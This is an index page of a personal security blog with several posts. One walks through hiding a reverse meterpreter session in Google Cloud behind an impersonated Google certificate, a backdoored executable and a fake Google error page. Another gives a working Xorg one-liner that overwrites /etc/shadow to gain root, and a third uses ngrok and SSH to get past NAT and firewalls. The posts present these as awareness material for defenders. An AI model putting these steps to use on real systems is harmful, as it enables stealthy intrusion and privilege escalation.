WSL2 does not appear to be shipped with Windows 10 1903

by on May.21, 2019, under Posts, Videos

Windows Subsystem for Linux (WSL) is a great way to run a Linux environment within Windows 10 locally without having to rely on cygwin or using virtual machines.

It is not without its limitations. For instance, raw sockets are not supported so that means if you want to really utilize tools like nmap, you won’t be able to do so. However, from what I’m gathering, it sounds like WSL2 will support raw sockets.

As of today, I’ve updated my home lab Windows 10 systems to the newest non-insider build (Version 1903 (OS Build 18362.116)) and it was my hope that WSL2 would be included. Unfortunately, this is not the case. The wsl.exe command does not have a –set-version parameter yet and a newly installed debian on the my test system with nmap still produces raw socket related errors.

I have high hopes for what will become of WSL. For more information, take a look at this video:

Leave a Comment :, , , , , , , , , more...

Hiding in Plain Sight – Abusing Cloud Hosting

by on Mar.20, 2019, under Posts

Today I want to present an idea that I’m sure is not new but is something that should be on the minds of paranoid system admins and information security related folks.

It is safe to say that we as a society rely on and trust cloud hosting services, such as Amazon AWS, Microsoft Azure, Google Cloud Compute, Linode, etc. Seeing connections out to these services via netstat, firewall appliances or UTMs may be over looked or blindly trusted. This exercise is to demonstrate how to potentially exploit that trust in these services.

For this instance, I decided to use Google Cloud Compute, due to two factors: there’s a free trial period and connections out to Google in organizational or residential environments is very common from my experience. (As of this time, according to, the Google Chrome browser has 65% of the browser market share.)

Setting up a Debian Linux VM in Google Cloud Compute is a snap and you’ll want to make sure ports 80 and 443 are accessible for this exercise. Once your VM is up and going, you can connect to it via ssh within the cloud console. Some initial setup may be needed depending on your preferences. Once done with these matters, simply install Metasploit:

curl > msfinstall && chmod 755 msfinstall && ./msfinstall

Once Metasploit is downloaded and going, let’s impersonate Google’s SSL:

Thanks to:

We can now backdoor a Google exe using the https reverse meterpreter payload that uses an impersonated Google SSL cert:

The next part (getting the payload on the victims system) will depend on creativity. For this case the AV evasion used in this method will not bypass most AV solutions but that is not the point of this exercise. (On a side note, AV evasion has become harder and harder.)

Now if you look at the generated exe on a Windows system, the PE looks pretty legit:

However, if you do run this executable, you will get an unknown publisher warning. So it’s not perfect but people do ignore this message.

As root, let’s setup the listener on the attackers end:

But before we run exploit -z -j, let’s add some more deception. You can use tools like httrack to essentially clone sites or web pages. The reason you may want port 80 forwarded to your VM is because you can setup a fake Google error page that redirects to Google and looks something like this:

Source code is available here:

(Favicon.ico is located here: )

That way if the victim/defender wants to connect to the IP address that the payload is connecting to, it appears to be a Google error page that simply redirects to

For hosting the page, you have various options, but for something quick and dirty you could do this (as root):

Once the victim has ran the payload, for the most part, an average tech savvy end user or network administrator, the characteristics would look benign:


The whois for the IP even says Google:

A quick view on Wireshark makes it look like this is normal as well:

If you set this payload to run automatically (via registry, shell:startup, etc), autoruns doesn’t flag it with a red color:

While this is happening, the attacker is granted with an SSL meterpreter session that in my humble opinion is pretty stealthy.

Is this method sound proof and perfect? By no means it is. UTMs and security network appliances that do SSL dissection and inspection would probably flag this, but it all depends on the target and what resources they have allocated toward defense.

There are some similar ideas for abusing cloud hosting service providers such as:

Leave a Comment :, , , , more...

eXploit X : “Give Me Root” – Computerphile

by on Nov.11, 2018, under Code, Exploits, Posts, Videos

Example of exploit: cd /etc; Xorg -fp “root::16431:0:99999:7:::” -logfile shadow :1;su

This is just another reason why if you run a headless server, to not have Xorg or a GUI installed. Reduce the attack surface as much as you can.

Leave a Comment :, , , , , , , , , more...

To have a ‘hacker’ phone or not… that is the question

by on Oct.13, 2018, under Posts

Mr. Robot - Pwnphone

Can I recommend from my experience for any average Joe, security specialist, or even computer enthusiast to have a rooted, custom kernel, Nethunter Android based phone as their primary cell phone to rely on? Honestly no, unless you have the time, resources, and expertise to troubleshoot issues with the device. Don’t get me wrong, it is awesome to have a device that fits in your pocket that when setup right, can do nmap vulnerability scans, arp poisoning, run the Social Engineering Toolkit and a plethora of other tools/actions. But you have to remember, projects like Nethunter, which are great for what they are, are community driven and fixes/issues may have to be resolved by the end user themselves.

If you’re going to venture down this path, feel free to but take some things into consideration. If this is going to be your primary phone, in the event of an emergency, can you count on it to not freeze or reboot when you need it? This is not to say that vanilla/stock phones won’t let you down but usually the vanilla/stock phones have more support and tend to be more stable. So with a security suite like Nethunter, which is not a ROM but is meant to run on top of a stock Android OS with a custom kernel, in my humble opinion you’re only adding complexity to the device and more chances to have an unstable device.

Another question you have to ask yourself would include, do you trust all these tools/pieces of software on your primary phone that you may use for banking and private matters? By rooting your phone and installing the likes of Nethunter, you are potentially turning your phone into a more advanced spying tool that could be used against you. (Also take note that rooting your phone just makes it less secure.) Just think of this, if an adversary can get onto a server through whatever exploitative means and they discovered a Kali chroot environment, how much more potential damage could they do? Now imagine this ‘server’ is your phone that you constantly keep on and charged and with you at nearly all times.

This is to not say that I advocate against ‘hacker’ phones or turning phones into offensive security devices. My point is that there’s a lot to take into consideration.  If you want a stable phone to do your regular smart phone related matters on, I recommend something stock with little to no mods and if you want a ‘hacker’ phone, I recommend getting a second phone that you do not heavily rely on. 

Now if we could run virtual machines on our phones with security hardened hardware passthrough options… that would make things interesting. (Interesting discussion here .)

1 Comment :, , , , , , , more...

Quick and dirty NAT/Firewall bypass using SSH and ngrok

by on Jun.13, 2018, under Posts

If you have a system that is behind a router/gateway/firewall device that you cannot poke holes in and you want to expose your system to the WAN, I recommend you check out ngrok. You can make a free account, download, and use the tool for free as well (with some limitations).

Once you have followed the simple instructions here, you can then put the ngrok executable into your $PATH (or %PATH%).  Provided if you have ssh listening on port 22 on your system that you’re trying to expose to the WAN, you can then simply run the following command: ngrok tcp 22. The output might look something like this:

Version 2.2.8
Region United States (us)
Web Interface
Forwarding tcp:// -> localhost:22

Connections ttl opn rt1 rt5 p50 p90
0 0 0.00 0.00 0.00 0.0

The beautiful thing about this is that you can see forwarding location by logging into your account and going to status. So this means you could script ngrok (via rc.local, shell:startup, crontab, etc…) to connect out on a regular basis and find the new forwarding location by going to your status page on The port from my experience is dynamic and changes, but interestingly enough you have to remember to be careful, I was able to find other ssh servers and open ports by scanning  port ranges on

Want to access the internal network using a browser? No problem! In this instance you would simply do: ssh -D 8000 -p 15551 and then set your browser to use your socks5 proxy on 8000.

There are other similar services like like and, but so far I like ngrok the best.



Leave a Comment :, , , , , , , more...

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!